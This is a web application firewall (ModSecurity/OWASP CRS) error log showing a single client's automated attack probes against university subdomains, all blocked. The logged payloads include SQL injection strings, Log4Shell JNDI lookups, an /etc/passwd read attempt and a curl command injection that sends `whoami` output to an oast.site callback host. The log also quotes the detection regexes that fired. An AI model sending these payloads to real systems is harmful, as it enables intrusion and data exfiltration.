[Tue Aug 29 11:31:33.457025 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQJWtoAAAAr"]
[Tue Aug 29 11:31:33.541642 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg4gbppqejqoph6.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0MAAAAL"]
[Tue Aug 29 11:31:33.612812 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAN@5GEAAAAO"]
[Tue Aug 29 11:31:33.617634 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg4tpgbkc5u44e3.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQKOcYAAAAs"]
[Tue Aug 29 11:31:33.652875 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQEGJ0AAAAm"]
[Tue Aug 29 11:31:33.653712 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAN@5GIAAAAO"]
[Tue Aug 29 11:31:34.308213 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQJWuYAAAAr"]
[Tue Aug 29 11:31:34.308470 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQMrssAAAAu"]
[Tue Aug 29 11:31:34.379240 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQkBVoAAAAC"]
[Tue Aug 29 11:31:34.380131 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGKUAAAAm"]
[Tue Aug 29 11:31:34.422454 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg533w7qdunpfsh.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10psCo-f0AAAN@5GYAAAAO"]
[Tue Aug 29 11:31:34.552408 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAP@M0MAAAAZ"]
[Tue Aug 29 11:31:35.316619 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10p8Co-f0AAAQMrtUAAAAu"]
[Tue Aug 29 11:31:35.331915 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10p8Co-f0AAAN@5GgAAAAO"]
[Tue Aug 29 11:31:35.395261 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQMrtYAAAAu"]
[Tue Aug 29 11:31:35.397119 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAPah0sAAAAL"]
[Tue Aug 29 11:31:35.398099 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQlGQkAAAAF"]
[Tue Aug 29 11:31:35.414851 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQMrtcAAAAu"]
[Tue Aug 29 11:31:35.416923 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAPah0wAAAAL"]
[Tue Aug 29 11:31:36.320889 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg6zi41ehbr3bse.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQkBWMAAAAC"]
[Tue Aug 29 11:31:36.325676 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQUH-UAAAA2"]
[Tue Aug 29 11:31:36.329245 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgshrnbeydszm1c.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAN@5G4AAAAO"]
[Tue Aug 29 11:31:36.329642 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQmR3YAAAAH"]
[Tue Aug 29 11:31:36.352795 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQJWvAAAAAr"]
[Tue Aug 29 11:31:36.355817 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQmR3cAAAAH"]
[Tue Aug 29 11:31:36.360788 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg6d6ajyhpb5hnz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAANsATQAAAAD"]
[Tue Aug 29 11:31:36.361019 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10qMCo-f0AAAQKOdAAAAAs"]
[Tue Aug 29 11:31:36.362378 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgwxd13a6ank7ko.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAPah1AAAAAL"]
[Tue Aug 29 11:31:36.381216 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgyebymh6xuzc1a.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQMrtwAAAAu"]
[Tue Aug 29 11:31:36.404016 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQMrt0AAAAu"]
